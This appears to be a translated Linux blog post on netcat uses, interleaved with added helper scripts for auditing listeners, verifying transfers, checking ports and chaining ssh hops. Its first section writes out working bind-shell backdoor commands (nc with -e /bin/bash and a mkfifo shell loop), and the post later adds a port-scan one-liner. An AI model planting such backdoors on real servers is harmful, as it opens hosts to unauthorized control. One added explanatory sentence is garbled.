XjjDog (xjjdog). Any reprint that does not retain this statement is plagiarism.

A single line of nc can take a long time to get right, because that one line packs a great deal of power. And, of course, if it is used carelessly, it will bring trouble down on its user.

The netcat tool, nc for short, is a very powerful tool on Linux (there are Windows builds too, of course). Because it is so powerful, some companies even lock it down: renaming or deleting the binary, or setting its permissions to 000. The reason is that it makes opening a backdoor on a server very easy and very convenient.

Where is the nc command located?

# whereis nc
nc: /usr/bin/nc /usr/share/man/man1/nc.1.gz

It tells me the file is in /usr/bin. Looking at it with the file command shows that it is actually a symbolic link.

# file /usr/bin/nc
/usr/bin/nc: symbolic link to `ncat'

Ncat: Concatenate and Redirect Sockets. This is a Swiss Army knife.

nc has a great many parameters; listing them all would only make you lose interest and miss out on a powerful tool (along with the chance to get yourself into trouble with the law). Instead, here are a few examples of how this command, a binary of under 1MB, won XjjDog's heart.

1. Installing a backdoor on the server

The following command opens port 5879 on the machine and attaches a shell to it. Server:

# nc -l -vv -p 5879 -e /bin/bash
Ncat: Version 6.40 (http://nmap.org/ncat)
Ncat: Listening on :::5879
Ncat: Listening on 0.0.0.0:5879

This setup is commonly called a "bounce shell" (strictly speaking a bind shell, since it is the server that listens); it can then be connected to remotely with nc to run commands.

Client:

# nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!

At this point, any shell command can be executed normally. The following GIF demonstrates this process.

Want something a little more powerful? For that we need the mkfifo command.

On the server, run the following two commands, which together form a loop: the FIFO feeds bash, and bash's output goes back through nc into the FIFO.

rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l  5879 > /tmp/f

Once the client connects with nc, an interactive terminal prompt appears directly:

$ nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
[root@localhost~]#

You might ask: when I close the client, why does the server-side command exit? If you want the server to keep listening after a client disconnects, add the -k parameter.
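Since this is exactly the kind of listener that gets nc locked down in the first place, here is what the check looks like from the other side. The script below is an added example, not part of the original post: it audits a process listing for netcat invocations that are listening and either execute a program (-e, -c, --exec, --sh-exec) or are wired into a shell through a FIFO, and reports plain listeners at a lower severity. The listing is a constructed sample in `ps -eo pid,user,args` format; on a real host you would pipe the live output of that command in instead.

```shell
# Added example (not from the original post): flag netcat listeners that hand
# out a shell. SAMPLE_PS is a constructed process listing in the format of
# `ps -eo pid,user,args`; replace it with the real command on a live host.

SAMPLE_PS='  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1203 app      nc -l -vv -p 5879 -e /bin/bash
 1310 app      ncat -lkp 8976 --sh-exec echo hello
 1422 app      nc -l 5879
 1500 dev      nc -vz db.internal 5432
 1601 www      /bin/sh -c cat /tmp/f | /bin/bash -i 2>&1 | nc -l 5879 > /tmp/f'

# audit_nc_listeners: reads a process listing on stdin and prints
# "<pid> <user> <severity> <reason>" for every nc/ncat/netcat listener.
#   HIGH  = listener combined with an exec flag or a FIFO-wired shell
#   INFO  = listener with no command attached (file transfer, test server, ...)
# Outbound connects (connectivity checks, port scans) are not reported.
audit_nc_listeners() {
    awk '
        # only lines whose arguments contain the nc/ncat/netcat command word
        $0 ~ "(^|[ /])(nc|ncat|netcat)( |$)" {
            # -l / --listen, alone or bundled into a flag cluster such as -lkp
            listen = ($0 ~ " -l[a-z]* | --listen| -[a-z]*l[a-z]* ")
            # -e/--exec run a program; -c/--sh-exec run a command via /bin/sh
            exec_  = ($0 ~ " -e | -c | --exec| --sh-exec")
            # the mkfifo pattern from the text: a named pipe feeding a shell
            fifo   = ($0 ~ "mkfifo|/tmp/f") && ($0 ~ "/bin/(ba)?sh")
            if (listen && (exec_ || fifo))
                printf "%s %s HIGH shell-bound-listener\n", $1, $2
            else if (listen)
                printf "%s %s INFO plain-listener\n", $1, $2
        }
    '
}

# Run over the constructed sample; on a live host use:
#   ps -eo pid,user,args | audit_nc_listeners
printf '%s\n' "$SAMPLE_PS" | audit_nc_listeners
```

The matching is deliberately broad (for instance `-c` also matches the `/bin/sh -c` of the FIFO pipeline), because a false positive on a process listing costs a glance while a missed bound shell costs the host. Pair it with a look at `ss -lntp` for the listening socket itself, since a renamed binary will not match on its command name.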

2. File and directory transfer

Still using SFTP? Or rz/sz?

These tools are useful, but they have to be installed. Sometimes things are urgent, or permissions are strict, and no such tool is available.

At that point, nc can help.

The server also listens on a port, but this time redirects to a file.

nc -l 5879 > file

The client then runs a command to send the file. This time the redirect arrow points the other way:

nc -v 192.16.1.54 5879 < redis-5.0.5.tar.gz

Files move fast this way! It is faster because there is no encryption involved at all.

If you look at their MD5, they’re exactly the same.

MD5 (redis-5.0.5.tar.gz) = 224cabf26d622f37528b398762e1578c
# md5sum file
224cabf26d622f37528b398762e1578c  file

I know you are already wondering about directories. That is an interesting process too.

We pipe the output of nc into tar. xfvz and cfvz are a matching pair of arguments, so you can guess what to do.

nc -l 5879  | tar xfvz -

That's right: the client command is the mirror image of the one above. This time, however, our nc command takes the packaged files from tar's output.

tar cfz - redis-5.0.5 | nc -v 192.16.1.54 5879

It’s really clever.
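The md5 comparison above is the step that matters: nc carries raw bytes with no integrity check and no encryption, so a truncated stream or a connection that died early just produces a shorter file. The script below is an added example, not from the original post, that builds the check into the transfer itself: the sender writes the SHA-256 digest as the first line of the stream and the payload after it, and the receiver reads that line, stores the rest, recomputes the digest and discards the file on a mismatch. It uses SHA-256 rather than the md5 shown in the text, and the demo run at the bottom replaces the `nc -l` / `nc host` pair with an ordinary pipe so it runs offline; the sample payload is constructed.

```shell
# Added example (not from the original post): nc file transfer with a leading
# digest line so the receiver can verify what arrived. Uses SHA-256 instead of
# the md5 in the text. The demo at the end uses a pipe in place of nc.

# sha256_of FILE: print the hex digest, using whichever tool the host has
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{print $1}'
    else
        openssl dgst -sha256 "$1" | sed 's/.*= *//'
    fi
}

# send_with_checksum FILE: stream = one digest line, then the raw file bytes
#   real use (sender):   send_with_checksum file | nc -v 192.16.1.54 5879
send_with_checksum() {
    sha256_of "$1"
    cat "$1"
}

# recv_verified DEST: read the digest line, store the payload, verify it.
#   real use (receiver): nc -l 5879 | recv_verified file
# Returns 0 on match, 1 on mismatch (DEST is removed), 2 if no digest arrived.
recv_verified() {
    dest=$1
    IFS= read -r expected || return 2   # read consumes exactly one line of the stream
    cat > "$dest"                        # everything after it is the payload
    actual=$(sha256_of "$dest")
    if [ "$expected" = "$actual" ]; then
        echo "ok: $dest $actual" >&2
        return 0
    fi
    echo "MISMATCH: expected $expected got $actual; discarding $dest" >&2
    rm -f "$dest"
    return 1
}

# Offline demo: a pipe stands in for the nc listener/client pair.
demo_dir=$(mktemp -d)
printf 'constructed sample payload\n' > "$demo_dir/sample.bin"   # constructed, not a real archive
send_with_checksum "$demo_dir/sample.bin" | recv_verified "$demo_dir/received.bin"
```

For the directory case, run `tar cfz - dir | send_with_checksum /dev/stdin` is not an option because the digest must be known before the bytes go out, so tar to a temporary archive first, or keep the text's plain pipeline and compare digests afterwards as the post does. The digest only detects corruption and truncation; anyone on the path can still read or rewrite the stream, which is what ssh/sftp add on top.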

3. Check the network connectivity

Yes, this is where the nc command is used most often.

If you want to check whether the Tomcat port on a server is open, you do not need to log in to the server and run ps to look at the process, or use netstat -antl to see which ports are listening.

Just use nc.

Type in the IP and port and it tells you the result.

# nc -vvv baidu.com 443
Connection to baidu.com port 443 [tcp/https] succeeded!

Of course, it can also scan a host for open ports, though that is of little use to most programmers.

nc -vzw 2 192.16.1.54 8888-9999
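The single connectivity check above is the building block of a service health probe. The script below is an added example, not from the original post: it wraps the `-z`/`-w` form in a function that returns a clear status code, falls back to bash's `/dev/tcp` pseudo-device on a host where nc has been removed (the lock-down mentioned at the start of the post), and checks a whole list of host/port pairs from stdin. The target list is constructed; nothing here opens a listener.

```shell
# Added example (not from the original post): reusable port connectivity check
# built on `nc -z -w TIMEOUT host port`, with a bash-only fallback for hosts
# where nc is not installed.

# check_port HOST PORT [TIMEOUT]: 0 = open, 1 = closed/unreachable, 2 = no tool
check_port() {
    host=$1; port=$2; timeout=${3:-3}
    if command -v nc >/dev/null 2>&1; then
        # -z: connect only, no I/O; -w: connect timeout in seconds
        nc -z -w "$timeout" "$host" "$port" </dev/null >/dev/null 2>&1
        return $?
    fi
    if [ -n "$BASH_VERSION" ]; then
        # bash-only fallback: opening /dev/tcp/HOST/PORT attempts a TCP connect;
        # note this path has no timeout control, so filtered ports may hang
        (exec 3<>"/dev/tcp/$host/$port") 2>/dev/null
        return $?
    fi
    return 2
}

# check_ports: read "host port" lines on stdin, print "host port status" per line
check_ports() {
    while read -r host port _; do
        [ -z "$host" ] && continue
        rc=0
        check_port "$host" "$port" 2 </dev/null || rc=$?
        case $rc in
            0) status=open ;;
            2) status=unknown ;;
            *) status=closed ;;
        esac
        printf '%s %s %s\n' "$host" "$port" "$status"
    done
}

# Constructed target list: 127.0.0.1:1 is closed on practically every host,
# and port 22 is only open if a local sshd is running.
printf '127.0.0.1 1\n127.0.0.1 22\n' | check_ports
```

Feed it the host/port pairs your application depends on (database, cache, Tomcat) and you get the same answer as the manual `nc -vvv` without ever logging in to the target; the `</dev/null` redirections matter because some nc builds would otherwise read the remaining lines of the list as data to send.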

4. Traversing firewalls

Take the diagram below (a picture in the original). You want to reach the machine tongariro, but you have no direct access to it: it can only be reached through aoraki's firewall, and aoraki in turn only accepts requests from ruapehu.

You can get there by chaining ssh commands:

ssh -A -t ruapehu.example.com ssh -A -t aoraki ssh -A tongariro

With ssh's ProxyCommand, the same thing becomes a simple configuration.

Use the following command to quickly open this channel.

ssh -oProxyCommand="ssh host1 nc host2 22" host2
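The one-liner above gets unwieldy once there are two hops, which is what ~/.ssh/config is for. The script below is an added example, not from the original post: it writes the three hosts from the text (ruapehu, aoraki, tongariro; the `.example.com` HostName is a placeholder) as config entries that use `nc %h %p` as the ProxyCommand, and includes a small resolver that walks those ProxyCommand lines to print the path ssh will take. The resolver only understands the `ssh <hop> nc %h %p` form used here.

```shell
# Added example (not from the original post): the two-hop chain from the text
# as ssh_config entries using nc as ProxyCommand, plus a resolver that shows
# the resulting path. Host names are from the text; HostName is a placeholder.

emit_ssh_config() {
    cat <<'EOF'
Host ruapehu
    HostName ruapehu.example.com
    ForwardAgent yes

# aoraki only accepts requests from ruapehu: ssh there, then nc to aoraki's port 22
Host aoraki
    ProxyCommand ssh ruapehu nc %h %p

# tongariro sits behind aoraki's firewall: the aoraki entry becomes the hop
Host tongariro
    ProxyCommand ssh aoraki nc %h %p
EOF
}

# next_hop HOST: print the host named in HOST's "ProxyCommand ssh <hop> nc %h %p", if any
next_hop() {
    emit_ssh_config | awk -v target="$1" '
        $1 == "Host" { cur = $2 }
        cur == target && $1 == "ProxyCommand" && $2 == "ssh" && $4 == "nc" { print $3 }
    '
}

# hop_chain HOST: follow ProxyCommand entries back to the first directly reachable host
hop_chain() {
    chain=$1
    hop=$(next_hop "$1")
    while [ -n "$hop" ]; do
        chain="$hop -> $chain"
        hop=$(next_hop "$hop")
    done
    printf '%s\n' "$chain"
}

# With these entries in ~/.ssh/config, "ssh tongariro" is all you type;
# ssh opens the ruapehu and aoraki legs itself.
hop_chain tongariro   # ruapehu -> aoraki -> tongariro
```

On OpenSSH 7.3 and later, `ProxyJump aoraki` in the config (or `ssh -J ruapehu,aoraki tongariro` on the command line) does the same without needing nc on the intermediate hosts, which is the form to prefer on machines where nc has been removed.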

5. Other

As you can see, many of these capabilities are not provided by nc itself but by the other commands it is combined with.

For example, here we implement a simple time server. You can access it using a web browser.

ncat -lkp 8976 --sh-exec 'echo -ne "HTTP/1.0 200 OK\r\n\r\nThe date is "; date; '

Or, for example, build a remote audio streaming service (the commands below record with arecord and encode with lame).

Server side:

arecord -f cd -c 2 | lame -b128 - - | netcat -u your-ip 6881 | mpg123 -

Client:

arecord -f cd -c 2 | lame -b128 - - | netcat -u -l 6881 | mpg123 -

Little Sister Flavor (XjjDog) is a WeChat public account that does not let programmers get sidetracked, focused on infrastructure and Linux. Ten years of architecture and tens of billions of daily requests: come discuss the world of high concurrency and get a different flavor.